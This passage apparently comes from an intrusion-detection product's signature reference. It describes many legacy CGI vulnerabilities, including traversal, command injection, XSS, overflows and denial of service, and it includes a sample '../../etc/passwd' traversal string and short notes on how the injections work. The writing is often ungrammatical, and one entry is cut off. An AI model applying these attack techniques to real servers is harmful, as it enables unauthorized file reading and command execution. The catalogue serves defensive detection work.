Signature Description: Infonautics provides online access to research materials, and uses getdoc.cgi to manage the
140
document purchase and view process. A malicious user could alter the content of getdoc.cgi links in order to bypass the
payment page, thereby freely viewing documents that they would normally pay money to access.
Signature ID: 1112
NetBSD global global.cgi remote commands execute vulnerability
Signature Description: NetBSD, Tama Communications Corporation, Global ports package 3.55 and prior versions are
vulnerable, these vulnerable versions are allowing a remote attacker to execute arbitrary commands on the system, The
Global CGI interface does properly validating quoted and escaped characters. By sending a specially-crafted format
string to the CGI interface, a malicious user(remote attacker) can execute shell commands on the system with the
security context of the web server. Upgrade to the newest version of global-4.0.1, patches are available at vendor
website.
Signature ID: 1113
Linksys Routers Gozila.CGI Denial Of Service Vulnerability
Signature Description: The Linksys EtherFast BEFSRU31 cable/DSL router connects multiple PCs to a high-speed
broadband Internet connection or to an Ethernet backbone. Configurable as a DHCP server, the EtherFast router acts as
the only externally recognized Internet device on local area network (LAN). The router can also be configured to block
internal users' access to the Internet. Linksys EtherFast BEFSRU31 Router 1.44 and prior versions are vulnerable,
 a malicious user(remote attacker) will send a specially-crafted request to gozila.cgi script after received the request
this script does not validate properly on parameters values(user input values) that are passed to the this script. The
server CPU becomes fully utilized by this malicious user the program stops servicing requests completely, then the
device will be under DoS.
Signature ID: 1114
CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability
Signature Description: Lars Ellingsen's Guestbook system is a comprehensive guestbook system with a number of
highly configurable features. Its main features are user defined form, view and preview-page, user defined HTML-code
between the entries in the view-page, E-mail notification, user defined thank-you e-mail to each guest, anti-spam
feature, Sort the entries in reverse order, Configurable time format, limiting the number of messages that is shown is
possible, Several languages supported by special language-files, Strip the message for any kind of HTML-tags,
Optional picture support, Bad words filter and Duplicated message check. Lars Ellingsen, Guestserver 4.12 and prior
versions are vulnerable, a malicious user(remote attacker)will send a specially crafted request to guestserver.cgi this
request contains executable code within pipe characters (|) in front of an email address in the email value of a
guestbook form. After recived the request the pipe meta character is not properly validating, code placed in the email
value is executed with the security context of the web server.
Signature ID: 1115
BizDesign ImageFolio.cgi access vulnerability
Signature Description: ImageFolio is a powerful multi-user browser-based administration area, unlimited heirarchial
catgories and subcategories, features are shopping cart, customer and orders database, SSL support for secure
checkouts, transactions, payment processing apabilities, and more. We can sell any type of product with ImageFolio
Commerce: stock photography, tangible products, services, photographic prints, digital downloads, software,
141
documents, etc. We have full control over pricing, shipping, taxation, transaction options, the look and feel of store.
BizDesign ImageFolio 3.01 version is vulnerable, this version does not validate properly the user input values to
imageFolio.cgi scripts, so there is possibility to inject script(XSS). A malicious user(remote attacker) can send specially
crafted URL to this script, when executed by a legitimate user, runs with the security context of the web server. In this
way, the attacker can obtain a legitimate user's session cookie, thereby posing as the user for the duration of the session.
Signature ID: 1120
Ntdll.dll Buffer Overflow Vulnerability
Signature Description: For IIS, WebDAV does not limit the length of the file name being requested. When processing
a WebDAV based request, method used is PROPFIND,LOCK,SEARCH or even GET with "translate:f" header, the
request is passed to series of functions, one of these being GetFileAttributesExW. Under the hood of
GetFileAttributesExW is a call to the RtlDosPathName_U function exported by ntdll.dll. This where actual
vulnerability lies.IIS 5.0 is prone to this vulnerability.
Signature ID: 1121
Last Lines CGI Script Directory Traversal Vulnerability
Signature Description: Last Lines CGI is a freely available script written in Perl and maintained by the Matrix's CGI
Vault.Lastlines.cgi is prone to directory traversal attacks. It is possible for a remote attacker to submit a maliciously
crafted web request which is capable of breaking out of wwwroot and browsing arbitrary web-readable files on a host
running the vulnerable script. The affected version of Last Line is 2.0.
Signature ID: 1122
WEB-CGI loadpage.cgi access vulnerability
Signature Description: Loadpage.cgi CGI program in EZshopper 3.0 and 2.0 allows remote attackers to list and read
files in the EZshopper data directory by inserting a "/" in front of the target filename in the "file" parameter.
Signature ID: 1123
WEB-CGI mailfile.cgi access vulnerability
Signature Description: OatMeal studios' Mail-File is a cgi application that allows for sending of certain files to userspecified email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents
of any readable user-specified files to an email address.The web interface provides the user with the option to
select files to send that have been pre-configured in the script. The values of the form variables associated with each
"pre-configured file" are the actual filenames that are used when opening the files. As a result, the user can manipulate
the filename value so that the script will, instead of opening one of the "normal" options, open whatever has been
specified as the filename (eg "../../../../../../../../../etc/passwd"). If exploited, an attacker can read arbitrary files on the
filesystem with the privileges of the webserver. This may lead to further compromise. Oatmeal Studios Mail File 1.10
is prone to this vulnerability.
142
Signature ID: 1124
WEB-CGI maillist.pl access Vulnerability
Signature Description: Maillist allows people to send e-mail to one address, whereupon their message is copied and
sent to all of the other subscribers to the maillist. This rule triggered when an attacker access to the maillist.pl script.
This successful exploitation can allow an attacker to execute arbitrary commands via shell metacharacters in the email
address.
Signature ID: 1125
3R Soft MailStudio mailview.cgi access vulnerability
Signature Description: 3R Soft's Mail Server provides industry-leading combination of reliability, scalability and
enterprise features for service providers and corporations. It supports integrated POP, IMAP, Web and wireless mail,
personal information management (PIM). 3R Soft MailStudio 2000 2.0 is vulnerable version, A malicious user(remote
attacker) could send a specially-crafted URL request to the mailview.cgi script, this request containing "dot dot"
sequences (/../) in the argument as a parameter value to traverse directories and view arbitrary files on the Web server.
After received the request this script does not validate properly the user given inputs, then there is a chnce to read
portions of arbitrary files. thereby compromising the confidentiality of other users email and password, as well as other
configuration and password files on the system.
Signature ID: 1126
WEB-CGI man.sh access vulnerability
Signature Description: Vulnerability in man.sh CGI script, included in May 1998 issue of SysAdmin Magazine, allows
remote attackers to execute arbitrary commands.An attacker can access an authentication mechanism and supply
his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the
administrator by supplying input of their choosing to the underlying CGI script. On Success the attacker gains the
admin access on the affected system.
Signature ID: 1127
Ministats admin access
Signature Description: Ministats is a Web site traffic analyzer which logs visits to any of web pages by placing a
simple, invisible tag. It also allows you to log referrals as well as total hits. This event is generated when an attempt is
made to gain unauthorized access to a web server or an application running on a web server. Some applications do not
perform stringent checks when validating the credentials of a client host connecting to the services offered on a host
server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored
on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited
by the attacker.
Signature ID: 1129
MRTG CGI Arbitrary File Display Vulnerability
Signature Description: The mrtg.cgi script is part of the MRTG traffic visualization application. MRTG Multi Router
Traffic Grapher CGI 2.9.17 -win32 and MRTG Multi Router Traffic Grapher CGI 2.9.17 -unix are vulnerable, A
malicious user(remote attacker) could send a specially-crafted URL request to the mrtg.cgi script, this request
143
containing "dot dot" sequences (/../) in the argument to the 'cfg=' parameter to traverse directories and view arbitrary
files on the Web server. After received the request this script does not validate properly the user given inputs, then there
is a chnce to read portions of arbitrary files.
Signature ID: 1130
WEB-CGI newdesk access Vulnerability
Signature Description: NEWDESK.INF file has all the configuration of desktop. This rule will tirgger's when an
attacker can access to the 'newdesk' file. This successful exploitation can allow an attacker to gain sensitive information
such as user name, password.
Signature ID: 1131
WEB-CGI nsManager.cgi access vulnerability
Signature Description: The Alabanza End User Control Panel versions 3.0 and earlier could allow a remote attacker to
gain access to the interface to manipulate domain names and Domain Name System information. Access to the Control
Panel which handles administrative controls for domains associated with Alabanza does not require a username and
password if specially crafted URLs are requested.
Signature ID: 1132
WEB-CGI perlshop.cgi access vulnerability
Signature Description: Perlshop.cgi shopping cart program stores sensitive customer information in directories and
files that are under the web root, which allows remote attackers to obtain that information via an HTTP request.
Signature ID: 1133
WEB-CGI pfdisplay.cgi access vulnerability
Signature Description: Pfdispaly CGI program for SGI's Performer API Search Tool allows read access to files.SGI
IRIX 6.4,SGI IRIX 6.3,SGI IRIX 6.2 are prone to this vulnerability.The issue is triggered when a malicious attacker
uses the IRIS Performer API Search Tool (pfdisplay) to access files, which will disclose any files
Signature ID: 1134
WEB-CGI post-query access vulnerability
Signature Description: NCSA Post-query is prone to a remotely exploitable buffer overflow condition.This is due to
insufficient bounds checking when handling HTTP POST requests.It is possible for remote attackers to corrupt
sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code. NCSA
post-query 1.0 is prone to this vulnerability. By sending 1000 bogus entries to the affected system and 1001th one as
specially crafted packet, attacker gains access on the affected system.
144
Signature ID: 1135
Ipswitch IMail Server Mailbox Denial of Service Vulnerability
Signature Description: Ipswitch IMail is an email server that serves clients their mail via a web interface. IMail
supports most common email protocols such as SMTP, POP3, IMAP4, and LDAP, etc. Ipswitch IMail 7.0.4 is
vulnerable version to a denial of service. A remote attacker could an invalid mails like the name of the mail is too long
i.e., that contains 248+ dots('.') after received this type of mails copying to mailbox then the web interface will crash.
Once interface crashes then it must be restarted to regain normal functionality. This signature checks attacks on
printmail CGI.
Signature ID: 1136
Ipswitch IMail Server Mailbox Denial of Service Vulnerability
Signature Description: Ipswitch IMail is an email server that serves clients their mail via a web interface. IMail
supports most common email protocols such as SMTP, POP3, IMAP4, and LDAP, etc. Ipswitch IMail 7.0.4 is
vulnerable version to a denial of service. A remote attacker could an invalid mails like the name of the mail is too long
i.e., that contains 248+ dots('.') after received this type of mails copying to mailbox then the web interface will crash.
Once interface crashes then it must be restarted to regain normal functionality. This signature checks attacks on
readmail CGI.
Signature ID: 1137
Ikonboard Arbitrary Command Execution Vulnerability
Signature Description: Ikonboard is a free forum system. Similair to UBB and UB, Ikonboard was written in Perl.
Jarvis Entertainment Group, Ikonboard 2.1.7b and prior versions are vulnerable, A remote attacker could send a URL
request setting the $SEND_MAIL variable in this URL, by setting the $SEND_MAIL variable in the URL, this request
will send to register.cgiscript, it is possible to specify the binary to execute as the httpd userid, and then register to
execute the program. After received this type of requests it is not validating properly the user given inputs, so this
design flaw makes it possible for a user with malicious intent to gain local access to a system running ikonboard.
Signature ID: 1138
John O'Fallon 'responder.cgi' DoS Vulnerability
Bugtraq: 3155
Signature Description: John O'Fallon 'responder.cgi' is a free CGI shell script, written in C, for MacHTTP Server and
other MacOS webserver products. John O'Fallon Responder.cgi 1.0 version is vulnerable to denial of service, a
malicious user(remote attacker) could send HTTP GET requests with an excessive number of characters will cause the
server to freeze. After received this type of request the MacHTTP webserver not validating proper bounds checking in
the script 'responder.cgi', it is possible to cause a denial of service to MacHTTP webserver. The webserver will need to
be restarted to regain normal functionality.
Signature ID: 1139
Webcom Datakommunikation CGI Guestbook rguest Vulnerability
Signature Description: The WebCOM Network is a collections of states (Departments), Districts, and Posts internet
145
communications and information sites that are under one umbrella orginization for format. Like going into a nationwide grocery store, you know where items will be from store to store. WebCom datakommunikation Guestbook 0.1 is
vulnerable version. A malicious user(remote attacker) could send a specially crafted request to rquest.exe, by
specifying the path and filename as the parameter "template". After received the request these programs not validate
properly, so this request can retrieve the contents of arbitrary files to which the web server has access.
Signature ID: 1140
WEB-CGI rksh access vulnerability
Signature Description: The rksh command invokes a restricted version of the Korn shell.Many sites that maintain a
Web server support CGI programs. Often these programs are scripts that are run by general-purpose interpreters, such
as /bin/sh or PERL. If the interpreters are located in the CGI bin directory along with the associated scripts, intruders
can access the interpreters directly and arrange to execute arbitrary commands on the Web server system
Signature ID: 1141
WEB-CGI nlog rpc-nlog.pl access vulnerability
Signature Description: Nlog is a package of scripts designed to correlate and analyze output from the nmap 2.0 port
scanning software. A vulnerability in versions of Nlog up to 1.1b could allow a remote attacker to execute certain
commands on the system as the user running the server process, usually "nobody." The attacker is limited to running
commands in uppercase, which limits the scope of this vulnerability.
Signature ID: 1142
Nlog rpc-smb.pl script allows some arbitrary commands vulnerability
Signature Description: NLog is a set of PERL scripts for managing and analyzing nmap 2.0+ log files. It allows to keep
all of scan logs in a single searchable database. The CGI interface for viewing scaned logs is completly customizable
and easy to modify and improve. The core CGI script allows to add your own extension scripts for different services, so
all hosts with a certain service running will have a hyperlink to the extension script. Various vendors, Common
Gateway Interface (CGI) are vulnerable, nLog 1.1a and prior versions are vulnerable, these versions of nlog CGI scripts
not validating properly the shell metacharacters from the IP address argument, which could allow remote attackers to
execute certain commands via nlog-smb.pl.
Signature ID: 1143
WEB-CGI rsh access Vulnerability
Signature Description: The rsh package contains a set of programs which allow users to run commands on remote
machines, login to other machines, and copy files between machines. This rule will trigger's when an attacker access to
the rsh. This successful exploitation can allow an attacker to execute arbitrary commands on the web server.
Signature ID: 1144
WEB-CGI rwwwshell.pl access Vulnerability
Signature Description: RWWWShell is a perl program for the paper "placing Backdoor through Firewalls". It allows
communicating with a shell through firewalls and proxy servers by imitating web traffic. This rule will trigger's when
146
an attacker access to the rwwwshell.pl CGI script. This successful exploitation can allow an attacker to obtain a shell
on the web server.
Signature ID: 1145
Apache Artificially Long Slash Path Directory Listing and ScriptAlias Source Retrieval
Vulnerability
Signature Description: Some applications do not perform stringent checks when parsing the URL resulting in reveal of
sensitive information or may cause a Denial of Service. Apache HTTP Server prior to 1.3.19 for Linux allows directory
listing on the Web server when a remote attacker sends multiple slashes in a HTTP request. NSCA httpd prior to and
including 1.5 and Apache Web Server prior to 1.0 also gives full listing of CGI-BIN directory if indexing is turned on
and a HTTP request with multiple slashes is sent. This may allow an attacker to audit scripts for vulnerabilities, retrieve
proprietary information, etc. Upgrade to newer version of the product.
Signature ID: 1146
Rod Clark Sendform.CGI Blurb File Disclosure Vulnerability
Signature Description: The sendform.cgi script can mail the information that a user enters on an HTML form. It also
can send the user a copy of the data entered on the form, and can send optional related files that define for each form.
Rod Clark sendform.cgi 1.4.4, Rod Clark sendform.cgi 1.4.3, Rod Clark sendform.cgi 1.4.2, Rod Clark sendform.cgi
1.4.1, Rod Clark sendform.cgi 1.4 versions are vulnerable. The vulnerability has been reported for sendform.cgi, which
may disclose arbitrary files to remote attackers. The script has an optional feature to send 'blurb files' to the email
addresses that are provided on the web form. However, sendform.cgi does not validate properly for the 'BlurbFilePath'
parameter. Thus it is possible for a remote attacker to modify the value of the BlurbFilePath parameter and obtain
access to arbitrary files.
Signature ID: 1147
WEB-CGI sendmessage.cgi access vulnerability
Signature Description: Sendmessage.cgi in W3Mail 1.0.2, and possibly other CGI programs, allows remote attackers to
execute arbitrary commands via shell meta characters in any field of the 'Compose Message' page
Signature ID: 1149
WEB-CGI setpasswd.cgi access vulnerability
Signature Description: The web administration interface for Interscan VirusWall 3.6.x and earlier does not use
encryption, which could allow remote attackers to obtain the administrator password to sniff the administrator
password via the setpasswd.cgi program or other HTTP GET requests that contain base64 encoded usernames and
passwords. setpasswd.cgi is used to modify the passwords, admin or user requests the setpasswd.cgi with the parameter
OPASS specifying the old pass, and PASS2, PASS3 parameters with the new password. the setpasswd.cgi modifies the
old pass with the new password. This request will be in clear or plain text format. If any worm or virus monitors this
they send the admin/user info to the attacker. attacker gains full access on the affected system.
147
Signature ID: 1150
WEB-CGI shopping cart directory traversal vulnerability
Signature Description: Directory traversal vulnerability in Hassan Consulting shop.cgi shopping cart program allows
remote attackers to read arbitrary files via directory traversal attack like ( ../ (dot dot slash)) with the page parameter.
Hassan Consulting Shopping Cart 1.18 is prone to this vulnerability. Because of this vulnerability attacker can all the
pages of the affected web-site.
Signature ID: 1152
WEB-CGI simplestmail.cgi access vulnerability
Signature Description: A vulnerability exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate
guestbook submissions from website visitors.An insecure call to the open() function leads to a failure to properly filter
shell meta characters from user supplied input. As a result, it is possible for an attacker to cause this script to execute
arbitrary shell commands with the privileges of the web server . Leif M. Wright simplestguest.cgi 2.0 is prone to this
vulnerability. guestbook parameter of simplestguest.cgi 2.0 is vulnerable if the guestbook parameter consists of
commands.
Signature ID: 1153
Snorkerz.cmd access
Signature Description: This event is generated when an attempt is made to gain unauthorized access to a CGI
application running on a web server. Some applications do not perform stringent checks when validating the credentials
escalated privileges to that of the administrator.
Signature ID: 1154
WEB-CGI statusconfig.pl access vulnerability
Signature Description: An input validation error exists in the statusconfig.pl script included in OmniHTTPD version
2.0.7.It uses mostbrowsers parameter to build the stats.pl script which will be executed on the web server.A remote
attacker can inject system commands in the parameter to execute and gain privileges. Omnicron OmniHTTPD 2.0.7 is
prone to this vulnerability.
Signature ID: 1155
Thinking Arts ES.One Directory Traversal Vulnerability
Signature Description: Thinking Arts LTD E-Commerce package comes with a webstore frontend called store.cgi
which allows people to basically order products on their website over a SQL database. Thinking Arts ES.One 1.0 is
vulnerable, These versions software's store.cgi script does not validate properly the user given data, the request contains
'../' sequences and '%00' escape characters, the remote attackers are could send this type of specially-crafted URL
requests send to store.xgi script, then will disclose the directory listing and files and directories of the target(web
server) with read permissions.
148
Signature ID: 1156
Interactive Story Directory Traversal Vulnerability
Signature Description: Valerie Mates Interactive Story 1.3 is vulnerable version, A remote attacker can set the 'next'
field to a file name and use "dot dot" sequences (/../) to traverse directories and read any file on the system. After
received this type of requests the script(story.pl) does not validating properly the hidden field 'next' passing values, the
program fails to proper validation the contents of the hidden field 'next'. Then the remote attacker could traverse
directories on the Web server.
Signature ID: 1157
WEB-CGI streaming server view_broadcast.cgi access
Signature Description: Apple's QuickTime Streaming Server technology that allows to send streaming media to clients
across the Internet using the industry standard RTP and RTSP protocols. Darwin Streaming Server provides a high
level of customizability and runs on a variety of platforms allowing to manipulate the code to fit the needs. Apple
Quicktime Streaming Server 4.1.3 and Apple Darwin Streaming Server 4.1.3 are vulnerable to a denial of service
condition. When an http request is made to the view_broadcast.cgi script without specifying any parameters, the server
will not accept new connections. This vulnerability is fixed in QuickTime/Darwin Streaming Server 4.1.3g.
Sdministrators are advised to update 4.1.3g or later version to resolve this issue.
Signature ID: 1158
Way to the Web TalkBack.cgi Directory Traversal Vulnerability
Signature Description: TalkBack is a CGI script written by Way to the Web. Way to the Web TalkBack 1.1 and prior
versions are vulnerable, these versions allowing website administrators to facilitate user feedback. A vulnerability
exists in talkback.cgi which can allow a remote user to traverse the file system of a target host. A malicious user(remote
attacker) will send a specially crafted uri to 'talkback.cgi' with invalid value will pass to 'article' parameter, after
received this type of request that script does not validate properly user given input, this may lead to the disclosure of
possibly sensitive file contents. Patches available, update latest version found at vendor website.
Signature ID: 1159
WEB-CGI technote main.cgi file directory traversal attempt vulnerability
Signature Description: Technote software for Technics, Roland, Yamaha, Casio and Hammond software, MIDI files,
accessories, music, free downloads, forums and more. Technote Technote 2001/2000 versions are vulnerable, in these
versions the 'main.cgi' script does not validate properly the user inputs through uri. A malicious user(remote attacker)
will send a specially-crafted uri to this script, after received the request, the attacker supplied variable is used as a
filename when the open() function is called. In addition to allowing the attacker to specify a file to be opened remotely,
the variable is not checked for '../' character sequences. As a result, the remote attacker can specify any file on the file
system as this variable (by using ../ sequences followed by its real path), which will be opened by the script. Its
contents will then be disclosed to the attacker. No remedy available.
149
Signature ID: 1160
WEB-CGI technote print.cgi directory traversal attempt vulnerability
Signature Description: Technote software for Technics, Roland, Yamaha, Casio and Hammond software, MIDI files,
accessories, music, free downloads, forums and more. Technote Technote 2001/2000 versions are vulnerable, in these
versions the 'print.cgi' script does not validate properly the user inputs through uri. A malicious user(remote attacker)
will send a specially-crafted uri to this script, after received the request, the attacker supplied variable is used for
processing. In addition to allowing the attacker to specify a file to be opened remotely, the variable is not checked for
'../' character sequences. As a result, the remote attacker can specify any file on the file system as this variable (by using
../ sequences followed by its real path), which will be opened by the script. Its contents will then be disclosed to the
attacker. No remedy available.
Signature ID: 1161
WEB-CGI test.cgi access vulnerability
Signature Description: A vulnerability in the test-cgi script included with some http daemons makes it possible for the
users of Web clients to read a listing of files they are not authorized to read. This script is designed to display
information about the Web server environment, but it parses data requests too liberally and thus allows a person to view
a listing of arbitrary files on the Web server host.
Signature ID: 1162
WEB-CGI txt2html.cgi access disclosure Vulnerability
Signature Description: Text to HTML(txt2html) is a program that converts plain text to HTML. It supports headings,
lists, simple character markup, and hyperlinking. It can also be used to aid in writing new HTML documents. This rule
triggered when an attacker access to txt2html.cgi with the dot dot sequences (/../). This successful exploitation can
allow an attacker to gain arbitrary files on the system.
Signature ID: 1163
WEB-CGI upload.pl access Vulnerability
Signature Description: Upload.pl is a simple CGI perl script to upload file. The script uses a text file as a user database.
The text file contains the colon separated userid, Unix crypted password and user's upload path. This rule triggered
when an attacker access to the upload.pl script. This successful exploitation can allow an attacker to gain sensitive
information such as userids and passwords.
Signature ID: 1164
Blackboard CourseInfo 4.0 Database Modification Vulnerability
Signature Description: Blackboard is a Web-based integrated teaching and learning environment. Blackboard
CourseInfo will support online classes at major universities such as Cornell University, Georgetown University, Yale
University, Tufts University and University of Pittsburgh, and availability on both Unix and Windows NT platforms.
Blackboard CourseInfo 4.0 is vulnerable version, this version software allows any user who has a valid account to
make modifications to the database. An attacker can enter custom form values through any perl script located in /bin
150
and its subdirectories to change other user's passwords or assign elevated security privileges. Attacker can do
operations on user_update_admin.pl.
Signature ID: 1165
Blackboard CourseInfo 4.0 Database Modification Vulnerability
Signature Description: Blackboard is a Web-based integrated teaching and learning environment. Blackboard
CourseInfo will support online classes at major universities such as Cornell University, Georgetown University, Yale
University, Tufts University and University of Pittsburgh, and availability on both Unix and Windows NT platforms.
Blackboard CourseInfo 4.0 is vulnerable version, this version software allows any user who has a valid account to
make modifications to the database. An attacker can enter custom form values through any perl script located in /bin
and its subdirectories to change other user's passwords or assign elevated security privileges.
Signature ID: 1166
Apple QuickTime/Darwin Streaming Server view_broadcast.cgi Denial of Service Vulnerability
Signature Description: QuickTime is a multimedia framework developed by Apple Inc., capable of handling various
formats of digital video, media clips, sound, text, animation, music, and several types of interactive panoramic images.
Apple QuickTime/Darwin Streaming Server 4.1.3 and earlier on Windows are vulnerable to denial of service condition.
A malicious user(remote attacker) could send a specially crafted request to view_broadcast.cgi script, Whenever an
HTTP request is made to the view_broadcast.cgi script without specifying any parameters, the server will not accept
new connections.
Signature ID: 1167
WEB-CGI w3tvars.pm access Vulnerability
Signature Description: W3tvars.pm file is used to locate Database name, host name, user name, and password fot the
database. This signature detects when an attacker access to the w3tvars.pm file. This successful exploitation can allow
an attacker to gain sensitive information such as user name, password.
Signature ID: 1168
WEB-CGI wais.pl access Vulnerability
Signature Description: WAIS is a program for searching large databases, lists, documents, directories of files, and so
on. It can also be used to provide search access to collections of audio, video, image, and multimedia information. This
rule triggered when an attacker requesting the 'wais.pl' script. This successful exploitation can allow an attacker to gain
sensitive information.
Signature ID: 1169
WEB-CGI web-map.cgi access Vulnerability
Signature Description: Web Map is a PHP script which is a simple and easy to use web based map. It is possible for the
users to view the map as an enlarged image and also allows to add their own points of interest directly on the map and
customize the settings without knowledge in PHP. This signature detects when an attacker access to the web-map.cgi
script.
151
Signature ID: 1170
WEB-CGI webdist.cgi access vulnerability
Signature Description: IRIX is a computer operating system developed by SGI to run natively on their 32-bit and 64bit MIPS architecture workstations and servers. The InfoSearch package converts man pages and other documentation
into HTML web content, the search form uses infosrch.cgi. SGI IRIX 6.3, SGI IRIX 6.2, SGI IRIX 6.1, SGI IRIX 5.3,
SGI IRIX 5.2, SGI IRIX 5.1, SGI IRIX 5.0 are vulnerable versions, The 'webdist.cgi' CGI program allows remote
attackers to execute arbitrary commands with the privileges of the web server process via shell metacharacters in the
'distloc' parameter.
Signature ID: 1171
WEB-CGI webplus directory traversal vulnerability
Signature Description: Webplus is a powerful and comprehensive development language for use in creating web-based
client/server applications. The webpsvr daemon is the driving process for the TalentSoft, Inc. web based ecommerce software. The Web+ server runs under a standard web server, such as Apache. Users run a CGI script called
webplus (webplus.exe on Windows), which communicates with webpsvr to serve up the web pages for the electronic
store that is implemented by Web+. TalentSoft Web+ 4.x is vulnerable versions, a malicious user(remote attacker)
could send a specially-crafted request URL that contains ../(dot dot) sequesnce passed via a 'script' variable passed to
the webplus CGI. This CGI can be passed a path to any file via the script variable, resulting in arbitrary files being
displayed to the browser.
Signature ID: 1172
Website Professional Directory Revealing Vulnerability
Signature Description: OReilly Software WebSite Professional 2.4.9 and OReilly Software WebSite Professional
2.3.18 are vulnerable. A malicious user(remote attacker) could send a malformed URL request, by sending this request
there is possible to get the complete absolute directory for web documents on a target server. The default error code
404 output displays the absolute path of the web document directory on the server running Website Pro.
Signature ID: 1173
Webcom Datakommunikation CGI Guestbook rguest/wguest Vulnerability
Signature Description: The WebCOM Network is a collections of states (Departments), Districts, and Posts internet
communications and information sites that are under one umbrella orginization for format. Like going into a nationwide grocery store, you know where items will be from store to store. WebCom datakommunikation Guestbook 0.1 is
vulnerable version. A malicious user(remote attacker) could send a specially crafted request to rquest.exe or
wquest.exe, by specifying the path and filename as the parameter "template". After received the request these programs
not validate properly, so this request can retrieve the contents of arbitrary files to which the web server has access.
Signature ID: 1174
CgiCentral WebStore Arbitrary Command Execution Vulnerability
152
Signature Description: Webstore is an shopping cart application which processes and manages online purchases. It is a
website that sells products or services and typically has an online shopping cart associated with it. With the popularity
of the Internet rapidly increasing, online shopping became advantageous for retail store owners, and many traditional
“brick and mortar” stores saw value in opening webstore counterparts. cgiCentral WebStore 400CS 4.14
and cgiCentral WebStore 400 4.14 versions are vulnerable. A malicious administrator, who do not have access to the
host serving the script, may use this vulnerability to gain access. If remote attackers can authenticate as administrators,
they may also be able to exploit this vulnerability to gain access to the host. Ws_mail.cgi calls system() with usersupplied data in the command string. Because it does not filter metacharacters out of the user-supplied data, it is
possible for administrators to execute arbitrary commands on webserver hosts.
Signature ID: 1175
Www-sql access Vulnerability
Signature Description: WWW-SQL is a script that provides a web interface for accessing MySQL or PostgresSQL
databases. It is a simple embedded scripting language. The commands are embedded in special HTML tags. This rule
will trigger when an attacker access to the www-sql script, an attacker can use this vulnerability to gain sensitive
information on the web server.
Signature ID: 1176
WWWBoard Password Disclosure Vulnerability
Signature Description: WWWBoard is a threaded World Wide Web discussion forum and message board, which
allows users to post new messages. It stores encrypted passwords in a password file(passwd.txt) that is under the web
root. This rule will trigger when an attacker access wwwadmin.pl script, an attacker can use this vulnerability to change
the name and location of 'passwd.txt'.
Signature ID: 1177
Abe Timmerman zml.cgi File Disclosure Vulnerability
Signature Description: Zml.cgi is a perl script which can be used to support server side include directives under
Apache. It recognizes a simple set of commands, and allows access to cgi parameters and environment variables. It can
run on Linux and Unix systems or any other platform with Apache and Perl support. Abe Timmerman zml.cgi all
versions are vulnerable, a malicious user(remote attacker) could send a specially-crafted URL request, that containing
"dot dot" sequences (/../) with a null byte character (%00) appended to the file name parameter, after received this type
of requests the zml.cgi script not validate properly, so then the attacker can view arbitrary files and directories on the
Web server.
Signature ID: 1178
Ipswitch WhatsUp Gold prn.htm Denial Of Service Vulnerability
Signature Description: Ipswitch WhatsUp Gold is comprehensive network monitoring software that allows IT
managers to turn network data into actionable business information. By proactively monitoring all critical network
devices and services. Ipswitch has created a forum to enable to share WhatsUp Gold product ideas and experiences
with other users online. The Forum is generally unmoderated, but we will occasionally post comments. The HTTP
daemon in Ipswitch, WhatsUp Gold 8.03 is vulnerable version, a malicious user(remote-attacker) will send a speciallycrafted request this device couldnot give any responce this is under DoS(server crash), when handling these type of
153
HTTP GET requests to the web interface by authenticated users. The attacker sending request contains an MS-DOS
device name, as demonstrated using "prn.htm", then this remote attacker could cause the program to crash.
Signature ID: 1179
NetScreen SA 5000 delhomepage.cgi XSS Vulnerability
Bugtraq: 9791
Signature Description: The NetScreen is a firewall of from Juniper, NetScreen NetScreen-SA 5000 Series is
vulnerable, this version is prone to a cross-site scripting vulnerability, that may allow an malicious user(attacker) to
execute arbitrary HTML or script code in the browser of a vulnerable user. A malicious user(remote attacker) will send
uri request with 'row' parameter to the 'delhomepage.cgi' script, this script after received these type of requests does not
validating properly the user-supplied data. So the attacker can execute arbitrary HTML code or script code in
browser.
Signature ID: 1180
RiSearch/RiSearch Pro Open Proxy Vulnerability
Signature Description: The RiSearch (and Pro) Suite is a set of PERL scripts that enables users to search web sites.
RiSearch does not use any libraries or database systems, just pure Perl. Therefore, it could be used on any server where
user account with CGI (even on some free hosting providers). Script is able to work with different languages, Simple
and convenient query language. RiSearch Software RiSearch Pro 3.2.6 and versions from RiSearch Software RiSearch
0.99.1 to RiSearch Software RiSearch 0.99.8 are vulnerable. A remote attacker could send a invalid URI request to
'show.pl' script, after received this type of requests, it is not performed for proper validation on user supplied URI
parameters. Then the remote attacker may exploit this condition in order to launch attacks against local and public
services in the context of the site that is hosting the vulnerable script.
Signature ID: 1181
Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability
Signature Description: WhatsUp Gold is the best network management software for businesess of all sizes, with SNMP
& WMI monitoring, comprehensive discovery, and instant alerting, notification, and reporting capabilities for single
site networks. Ipswitch WhatsUp Gold 8.0 3, Ipswitch WhatsUp Gold 8.0 1, Ipswitch WhatsUp Gold 8.0, Ipswitch
WhatsUp Gold 7.0 4, Ipswitch WhatsUp Gold 7.0 3, Ipswitch WhatsUp Gold 7.0 versions are vulnerable to buffer
overflow. A malicious user(remote attacker) could post a specially-crafted long string for the instancename parameter
to overflow a buffer and execute arbitrary code on the system. After received this type of requests, the _maincfgret.cgi
script copy the user given inputs into insufficient buffer, then this buffer will overflow.
Signature ID: 1185
IBill Management Script Weak Hard-Coded Password Vulnerability
Signature Description: IBill Internet Billing Company Processing Plus 0 is vulnerabile version. iBill hard codes a weak
password for the user management script, ibillpm.pl, installed for clients that use the Password Management system.
The weak password is the client's MASTER_ACCOUNT plus only 2 letters that are lower-case (aa - zz). So attacker to
bypass the billing system and easily add/delte/chgpwd of arbitrary users in the .htpasswd file by posting a brute force.
The CGI keeps no auditing record of what changes it makes, nor does the web log file indicate what username was
154
added to the system (doesn't log POST data). Inaddition, the requests in the web log file all have HTTP response code
200, which usually doesn't indicate problems in error_log.
Signature ID: 1186
Mailman directory traversal attempt vulnerability
Signature Description: Mailman is free software for managing electronic mail discussion and e-newsletter lists.
Mailman is integrated with the web, making it easy for users to manage their accounts and for list owners to administer
their lists. Mailman 2.1.5 and earlier versions are vulnerable to read arbitrary files. A malicious user(remote attacker)
could send a specially crafted URL request to server, this user is a member of a private mailman list can submit this
